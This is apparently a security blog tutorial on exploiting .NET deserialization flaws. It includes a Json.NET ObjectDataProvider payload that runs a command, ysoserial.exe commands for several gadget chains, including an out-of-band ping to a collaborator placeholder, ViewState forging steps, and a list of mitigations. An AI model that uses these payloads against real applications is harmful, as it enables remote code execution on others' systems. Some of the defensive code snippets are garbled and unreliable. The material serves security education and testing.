Listen to this Post

Introduction:
.NET deserialization vulnerabilities represent a critical attack vector where untrusted data is improperly converted into objects, leading to remote code execution (RCE). This article deconstructs the advanced exploitation techniques used by security researchers and bug bounty hunters, moving beyond black-box testing to a white-box approach that involves code analysis, custom gadget chain development, and precise payload generation.
Learning Objectives:
- Identify and audit .NET serialization sinks in source and compiled binaries.
- Construct and deploy custom gadget chains for JSON, XML, and BinaryFormatter.
- Implement and automate exploits using tools like YSoSerial.Net and debuggers.
- Apply secure coding and configuration practices to mitigate these vulnerabilities.
You Should Know:
1. Identifying Vulnerable Serialization Sinks
Before exploitation, you must locate the vulnerability. This often involves analyzing .NET assemblies for known dangerous formatters like BinaryFormatter, `Json.NET` with `TypeNameHandling` set, or XmlSerializer.
Step-by-step guide:
Decompile the Application: Use a tool like `dnSpy` or `ILSpy` to reverse engineer a .NET DLL or executable.
Load the assembly into dnSpy for interactive analysis. Search for keywords: BinaryFormatter, JavaScriptSerializer, JsonConvert, XmlSerializer
Trace Data Flow: Identify where user-controlled input (e.g., cookies, view state, API parameters) enters a deserialization routine.
Debug Without Source: Attach a debugger like `dnSpy` or Visual Studio to the running process. Set breakpoints on deserialization methods to inspect the serialized data format and type restrictions.
2. Exploiting with the ObjectDataProvider Gadget
The `ObjectDataProvider` gadget is a cornerstone for .NET deserialization RCE. It wraps an object and allows method invocation, which can be chained to call Process.Start.
Step-by-step guide:
Understand the Gadget: This WPF class can be serialized. Its `MethodName` and `MethodParameters` properties are set during deserialization and later invoked.
Craft a JSON.Net Payload: When `TypeNameHandling` is enabled, a payload can specify the `ObjectDataProvider` type.
{
"$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework",
"MethodName": "Start",
"ObjectInstance": {
"$type": "System.Diagnostics.Process, System",
"StartInfo": {
"$type": "System.Diagnostics.ProcessStartInfo, System",
"FileName": "cmd",
"Arguments": "/c whoami"
}
}
}
Deliver the Payload: Submit this JSON to a vulnerable “RememberMe” or similar endpoint.
3. Exploiting XML Serialization with ExpandedWrapper
`XmlSerializer` has stricter constraints, but `ExpandedWrapper` can bypass them by “wrapping” the gadget in a serializable type, and `XamlReader` can parse the embedded payload for execution.
Step-by-step guide:
Construct the Wrapper: Use `ExpandedWrapper` to combine `XamlReader` and ObjectDataProvider.
Generate the XML Payload: A tool like YSoSerial.Net (ysoserial.exe) automates this.
ysoserial.exe -f XmlSerializer -g ExpandedWrapper -o base64 -c "calc"
Exploit the Import Function: The generated Base64 payload can be sent to a function using XmlSerializer.Deserialize().
4. Leveraging the TypeConfuseDelegate Gadget
This sophisticated gadget exploits how delegates are compared in a SortedSet, leading to confusion and arbitrary method invocation during sorting.
Step-by-step guide:
Gadget Chain Logic: The `ComparisonComparer` is tricked into using a `MulticastDelegate` as a `Comparison` delegate. When the `SortedSet` is sorted, it invokes the delegate.
BinaryFormatter Exploitation: This chain works brilliantly with BinaryFormatter, commonly used in .NET remoting or `LosFormatter` (ViewState).
ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -c "cmd /c ping YOUR_COLLABORATOR.oastify.com"
Forging ViewState: For web applications, combine this with the `__VIEWSTATEGENERATOR` and validation key (if known) to forge a malicious, signed ViewState.
5. Automating with YSoSerial.Net and Defense Strategies
Manual gadget crafting is educational, but automation is key for efficient testing.
Step-by-step guide:
Generate Payloads: Use YSoSerial.Net to test different formatters and gadgets.
Test all gadgets for a specific formatter ysoserial.exe -f BinaryFormatter --gadgettest -c "echo test"
Implement Defenses:
- Avoid Untrusted Deserialization: Use safe data formats like plain JSON or JWT without custom type binding.
- Restrict Type Bindings: In
Json.NET, set `TypeNameHandling` to `None` or use a custom `SerializationBinder` to allow-list types.serializer.SerializeBinder = new DefaultSerializationBinder { / Restricted type logic / }; - Use Secure Alternatives: Replace `BinaryFormatter` with `DataContractSerializer` or
Protobuf-net. - Apply Digital Signatures: Sign serialized data with HMAC to ensure integrity.
using (var hm = new HMACSHA256(key)) { signature = hm.ComputeHash(serializedBytes); } - Enforce Least Privilege: Run application pools with minimal permissions to limit the impact of a successful exploit.
What Undercode Say:
- Whitebox Mastery is Key: True expertise in .NET deserialization shifts from payload spraying to understanding internal CLR mechanics, enabling the creation of novel gadgets and bypassing proprietary serializers.
- Defense is a Multi-Layered Architecture: Effective mitigation is not a single setting but a combination of input validation, strict type whitelisting, cryptographic integrity checks, and runtime privilege reduction.
The analysis reveals that .NET deserialization attacks are evolving from well-trodden public gadget chains towards the exploitation of custom, application-specific object graphs. This demands deeper reverse engineering skills from attackers but also presents a broader attack surface for defenders. The most critical insight is that many applications implement unnecessary serialization; replacing it altogether is the most robust defense. The ongoing development of tools like YSoSerial.Net lowers the barrier for entry, making the understanding and implementation of these defenses more urgent than ever.
Prediction:
In the next 2-3 years, we will see a surge in deserialization vulnerabilities within modern architectures, including microservices using gRPC/protobuf and serverless functions with persistent state objects. AI-assisted code analysis will dramatically speed up the discovery of vulnerable sinks and custom gadget chains, making sophisticated whitebox exploits more accessible. Simultaneously, the adoption of memory-safe languages like Rust for new components will shrink the attack surface in greenfield development, leaving legacy .NET and Java applications as the primary, high-value targets for these attack techniques.
▶️ Related Video (84% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Hackhuang Completed – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


